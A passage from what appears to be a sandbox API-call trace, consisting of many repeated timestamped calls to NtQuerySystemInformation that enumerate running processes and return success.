SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1c748) returned 0x0 [0156.534] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1c748) returned 0x0 [0156.539] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1c748) returned 0x0 [0156.540] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1c748) returned 0x0 [0156.540] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1c748) returned 0x0 [0156.541] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1c748) returned 0x0 [0156.548] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1c748) returned 0x0 [0156.553] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1c748) returned 0x0 [0156.559] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1c748) returned 0x0 [0156.559] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1c748) returned 0x0 [0156.560] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1c748) returned 0x0 [0156.562] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1c748) returned 0x0 [0156.566] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1c748) returned 0x0 [0156.572] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1c748) returned 0x0 [0156.659] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1c748) returned 0x0 [0156.660] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1c748) returned 0x0 [0156.661] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1c748) returned 0x0 [0156.662] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1c748) returned 0x0 [0156.667] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1c748) returned 0x0 [0156.678] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1c748) returned 0x0 [0156.683] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1c748) returned 0x0 [0156.688] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1c748) returned 0x0 [0157.107] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1bfc8) returned 0x0 [0157.109] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1bfc8) returned 0x0 [0157.110] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1bfc8) returned 0x0 [0157.111] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1bfc8) returned 0x0 [0157.111] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1bfc8) returned 0x0 [0157.112] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1bfc8) returned 0x0 [0157.113] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1bfc8) returned 0x0 [0157.118] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1bfc8) returned 0x0 [0157.119] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1bfc8) returned 0x0 [0157.119] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1bfc8) returned 0x0 [0157.120] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1bfc8) returned 0x0 [0157.121] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1bfc8) returned 0x0 [0157.122] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1bfc8) returned 0x0 [0157.127] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1bfc8) returned 0x0 [0157.128] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1bfc8) returned 0x0 [0157.128] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1bfc8) returned 0x0 [0157.129] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1bfc8) returned 0x0 [0157.130] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1bfc8) returned 0x0 [0157.131] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1bfc8) returned 0x0 [0157.131] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1bfc8) returned 0x0 [0157.136] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1bfc8) returned 0x0 [0157.136] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1bfc8) returned 0x0 [0157.137] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1bfc8) returned 0x0 [0157.138] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1bfc8) returned 0x0 [0157.139] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1bfc8) returned 0x0 [0157.139] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1bfc8) returned 0x0 [0157.260] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1bf88) returned 0x0 [0157.262] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1bf88) returned 0x0 [0157.263] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1bf88) returned 0x0 [0157.263] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1bf88) returned 0x0 [0157.264] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1bf88) returned 0x0 [0157.265] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1bf88) returned 0x0 [0157.266] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1bf88) returned 0x0 [0157.270] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1bf88) returned 0x0 [0157.271] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1bf88) returned 0x0 [0157.272] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1bf88) returned 0x0 [0157.273] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1bf88) returned 0x0 [0157.273] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1bf88) returned 0x0 [0157.274] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1bf88) returned 0x0 [0157.275] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1bf88) returned 0x0 [0157.280] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1bf88) returned 0x0 [0157.281] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1bf88) returned 0x0 [0157.282] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1bf88) returned 0x0 [0157.282] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1bf88) returned 0x0 [0157.283] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1bf88) returned 0x0 [0157.284] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1bf88) returned 0x0 [0157.288] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1bf88) returned 0x0 [0157.289] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1bf88) returned 0x0 [0157.290] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1bf88) returned 0x0 [0157.291] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1bf88) returned 0x0 [0157.291] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1bf88) returned 0x0 [0157.292] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1bf88) returned 0x0 [0157.293] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1bf88) returned 0x0 [0157.361] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1bf88) returned 0x0 [0157.362] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1bf88) returned 0x0 [0157.363] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1bf88) returned 0x0 [0157.364] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1bf88) returned 0x0 [0157.365] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1bf88) returned 0x0 [0157.366] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1bf88) returned 0x0 [0157.367] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1bf88) returned 0x0 [0157.371] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1bf88) returned 0x0 [0157.372] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1bf88) returned 0x0 [0157.373] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1bf88) returned 0x0 [0157.373] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1bf88) returned 0x0 [0157.374] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1bf88) returned 0x0 [0157.375] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1bf88) returned 0x0 [0157.379] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1bf88) returned 0x0 [0157.380] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1bf88) returned 0x0 [0157.381] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1bf88) returned 0x0 [0157.382] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1bf88) returned 0x0 [0157.382] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1bf88) returned 0x0 [0157.383] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1bf88) returned 0x0 [0157.384] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1bf88) returned 0x0 [0157.388] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1bf88) returned 0x0 [0157.389] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1bf88) returned 0x0 [0157.389] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1bf88) returned 0x0 [0157.390] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1bf88) returned 0x0 [0157.391] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1bf88) returned 0x0 [0157.392] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1bf88) returned 0x0 [0157.413] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1bf88) returned 0x0 [0157.414] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1bf88) returned 0x0 [0157.415] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1bf88) returned 0x0 [0157.416] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1bf88) returned 0x0 [0157.416] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1bf88) returned 0x0 [0157.417] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1bf88) returned 0x0 [0157.418] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1bf88) returned 0x0 [0157.422] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1bf88) returned 0x0 [0157.423] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1bf88) returned 0x0 [0157.424] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1bf88) returned 0x0 [0157.425] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1bf88) returned 0x0 [0157.425] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1bf88) returned 0x0 [0157.426] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1bf88) returned 0x0 [0157.432] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1bf88) returned 0x0 [0157.433] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1bf88) returned 0x0 [0157.434] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1bf88) returned 0x0 [0157.435] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1bf88) returned 0x0 [0157.436] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1bf88) returned 0x0 [0157.437] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1bf88) returned 0x0 [0157.438] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1bf88) returned 0x0 [0157.444] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1bf88) returned 0x0 [0157.445] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1bf88) returned 0x0 [0157.446] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1bf88) returned 0x0 [0157.486] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1c098) returned 0x0 [0157.488] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1c098) returned 0x0 [0157.489] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: 